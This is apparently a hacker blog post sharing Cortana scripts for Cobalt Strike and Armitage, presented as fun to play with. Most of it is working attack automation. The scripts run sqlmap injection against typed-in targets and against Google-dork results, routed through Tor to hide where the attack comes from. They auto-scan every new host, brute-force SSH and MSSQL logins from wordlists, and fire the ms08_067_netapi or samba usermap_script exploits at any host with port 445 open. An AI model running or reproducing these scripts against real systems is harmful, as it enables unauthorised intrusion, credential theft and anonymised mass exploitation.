Today i work a little bit with Cobalt Strike 21 Days Demo.
Really Great Pentest tool like Armitage http://www.advancedpentest.com/
After some time i found the Script menu into Cobalt Stike,letz google it what we can do with the Script Engine.
After a while a found a great pdf doko about the Contana Script Engine. Download the pdf here cortana_tutorial.pdf
Now letz play with it.
# Contana-Info Sites Engine v0.1 # Contana Script Engine r0ckz. # by cr4shyyy # from http://security-is-just-an-illusion.blogspot.de menubar("Web ToolKit", "webstuff",2); popup webstuff { menu "Info Sites" { item "Security is just an Illusion" { url_open("http://security-is-just-an-illusion.blogspot.de/" ); } item "TheHackerNews" { url_open("http://thehackernews.com/"); } item "Securitytube" { url_open("http://www.securitytube.net"); } item "Shodanhq" { url_open("http://www.shodanhq.com/"); } item "Exploit-db" { url_open("http://www.exploit-db.com/"); } item "1337day" { url_open("http://1337day.com/"); } item "Privatepaste" { url_open("http://privatepaste.com/"); } item "Hash-cracker.com" { url_open("http://www.hash-cracker.com/"); } item "Rainbowtables.it64.com" { url_open("http://rainbowtables.it64.com/"); } item "X-attack.net" { url_open("https://www.x-attack.net/?rtcrack"); } } }
# Contana-Tor Network Engine v0.1 # Contana Script Engine r0ckz. # by cr4shyyy # from http://security-is-just-an-illusion.blogspot.de menubar("Web ToolKit", "webstuff",2); popup webstuff { menu "Tor Engine" { item "Start Tor" { println("\n----------------------------------------\n\c4Starting\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------"); $console = console(); $console = open_console_tab("Start Tor NetWork"); cmd($console, "tor"); #sleep(30 * 1000); db_sync() } item "Kill Tor" { println("\n----------------------------------------\n\c4Stop\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------"); $console = console(); $console = open_console_tab("Kill Tor NetWork"); cmd($console, "killall tor"); #sleep(30 * 1000); db_sync() } item "Restart Tor" { println("\n----------------------------------------\n\c4Restart\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------"); $console = console(); $console = open_console_tab("Restart Tor NetWork"); cmd($console, "killall tor && tor"); #sleep(30 * 1000); db_sync() } } }
# Contana-Sqlmap Interface Engine v0.1 # Contana Script Engine r0ckz. # by cr4shyyy # from http://security-is-just-an-illusion.blogspot.de # Change Gnome Profile to avoid terminal close after exploit println("\n----------------------------------------\n\c4[*] Contana-Sqlmap Engine v0.1 Loaded [*] \n----------------------------------------"); menubar("Web ToolKit", "webstuff",2); popup webstuff { menu "Sqlmap" { item "Attack" { $ip = prompt_text("Target + option --dbs ?"); if ($ip !is $null) { show_message("Lets Pwn The Box!"); println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap\nIP: \c9$ip\c9 \n----------------------------------------"); $console = console(); cmd($console, "gnome-terminal -x sqlmap --random-agent -u $ip ;bash"); db_sync() } } item "Attack over Tor" { $ip = prompt_text("Target + option --dbs ?"); if ($ip !is $null) { show_message("Lets Pwn The Box!"); println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------"); $console = console(); cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -u $ip ;bash"); db_sync() } } item "Attack with GDork" { $ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?"); if ($ip !is $null) { show_message("Lets Pwn The Box!"); println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with google Dorks\nIP: \c9$ip\c9 \n----------------------------------------"); $console = console(); cmd($console, "gnome-terminal -x sqlmap --random-agent -g $ip ;bash"); db_sync() } } item "Attack with GDork over Tor" { $ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?"); if ($ip !is $null) { show_message("Lets Pwn The Box!"); println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with Google Dorks over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------"); $console = console(); cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -g $ip ;bash"); db_sync() } } item "GDorks List" { url_open("http://pastebin.com/raw.php?i=QFhBYbPw"); } } }
# Contana-Quick-Scan Engine v0.1 # Contana Script Engine r0ckz. # by cr4shyyy # from http://security-is-just-an-illusion.blogspot.de println("\n----------------------------------------\n\c4[*] Contana-Quick-Scan Engine v0.1 Loaded [*] \n----------------------------------------"); # Preform auto scan on host_add { sleep(10 * 1000); println("\n----------------------------------------\n\c4[*] Scanning New Host \nIP : \c9$1\c9\n----------------------------------------"); $console = console(); #$console = open_console_tab("Scanning New Host"); cmd($console, "use auxiliary/scanner/portscan/tcp"); cmd($console, "set THREADS 100"); cmd($console, "set PORTS 21, 22, 23, 25, 80, 110, 143, 443, 445, 1433, 3306, 4899, 5800, 5801, 8080"); cmd($console, "set RHOSTS $1"); cmd($console, "run -j"); cmd($console, "use auxiliary/scanner/discovery/udp_sweep"); cmd($console, "set THREADS 100"); cmd($console, "set BATCHSIZE 256"); cmd($console, "set RHOSTS $1"); cmd($console, "run -j"); #sleep(30 * 1000); db_sync(); } on service_add_21 { println("\n----------------------------------------\n\c4[*] FTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 21 Open\n----------------------------------------"); } on service_add_22 { println("\n----------------------------------------\n\c4[*] SSH-SERVER FOUND \nIP : \c9$1\c9\nPort : 22 Open\n----------------------------------------"); } on service_add_23 { println("\n----------------------------------------\n\c4[*] TELNET-SERVER FOUND \nIP : \c9$1\c9\nPort : 23 Open\n----------------------------------------"); } on service_add_25 { println("\n----------------------------------------\n\c4[*] SMTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 25 Open\n----------------------------------------"); } on service_add_80 { println("\n----------------------------------------\n\c4[*] WEB-SERVER FOUND \nIP : \c9$1\c9\nPort : 80 Open\n----------------------------------------"); } on service_add_110 { println("\n----------------------------------------\n\c4[*] POP3-SERVER FOUND \nIP : \c9$1\c9\nPort : 110 Open\n----------------------------------------"); } on service_add_143 { println("\n----------------------------------------\n\c4[*] IMAP-SERVER FOUND \nIP : \c9$1\c9\nPort : 143 Open\n----------------------------------------"); } on service_add_443 { println("\n----------------------------------------\n\c4[*] HTTPS-SERVER FOUND \nIP : \c9$1\c9\nPort : 443 Open\n----------------------------------------"); } on service_add_445 { println("\n----------------------------------------\n\c4[*] MICROSOFT-DS-SERVER FOUND \nIP : \c9$1\c9\nPort : 445 Open\n----------------------------------------"); } on service_add_1433 { println("\n----------------------------------------\n\c4[*] MS-SQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 1433 Open\n----------------------------------------"); } on service_add_3306 { println("\n----------------------------------------\n\c4[*] MYSQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 3306 Open\n----------------------------------------"); } on service_add_4899 { println("\n----------------------------------------\n\c4[*] RADMIN-SERVER FOUND \nIP : \c9$1\c9\nPort : 4899 Open\n----------------------------------------"); } on service_add_5800 { println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5800 Open\n----------------------------------------"); } on service_add_5801 { println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5801 Open\n----------------------------------------"); } on service_add_8080 { println("\n----------------------------------------\n\c4[*] Shared-Service-SERVER FOUND \nIP : \c9$1\c9\nPort : 8080 Open\n----------------------------------------"); } # EOF
# Brute New Host with SSH Server Ready on it. # by http://security-is-just-an-illusion.blogspot.de/ # Preform auto msf port scan # by monstream00 on host_add { sleep(10 * 1000); println("[*] msfScanning New Host TCP/UDP on $1"); $console = console(); #$console = open_console_tab("TCP/UDPscan_$1"); #Debug use cmd($console, "use auxiliary/scanner/portscan/tcp"); cmd($console, "set THREADS 100"); cmd($console, "set PORTS 21, 22, 80, 110, 143, 443, 445, 1433, 3306, 8080"); cmd($console, "set RHOSTS $1"); cmd($console, "run -j"); cmd($console, "use auxiliary/scanner/discovery/udp_sweep"); cmd($console, "set THREADS 100"); cmd($console, "set BATCHSIZE 256"); cmd($console, "set RHOSTS $1"); cmd($console, "run -j"); #sleep(30 * 1000); db_sync(); } on service_add_22 { println("\n----------------------------------------\n\c4Attempting to bruteforce\c4 SSH-Server\nIP: \c9$1\c9 \n----------------------------------------"); auxiliary("scanner/ssh/ssh_login", @($1), %( THREADS => '100', STOP_ON_SUCCESS => '1', USER_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_users.txt', PASS_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt')); }
# Brute New Host with MSSQL Server Ready on it. # by http://security-is-just-an-illusion.blogspot.de/ on service_add_1433 { println("Attempting to brute force MSSQL-Server |$1|"); auxiliary("scanner/mssql/mssql_login", @($1), %( USER_FILE => '/opt/framework3/msf3/data/wordlists/unix_users.txt', PASS_FILE => '/opt/framework3/msf3/data/wordlists/unix_passwords.txt')); }
# Exploit New Host with microsoft-ds samba with the ms08_067_netapi exploit. # by http://security-is-just-an-illusion.blogspot.de/ on service_add_445 { println("[*]Exploiting $1 with ms08_067_netapi sploit (" . host_os($1) . ")"); if (host_os($1) eq "Microsoft Windows") { exploit("windows/smb/ms08_067_netapi", $1); } else { exploit("multi/samba/usermap_script", $1, $null, $null, 1); } }
Now Have pfun with Contana Script Engine ;)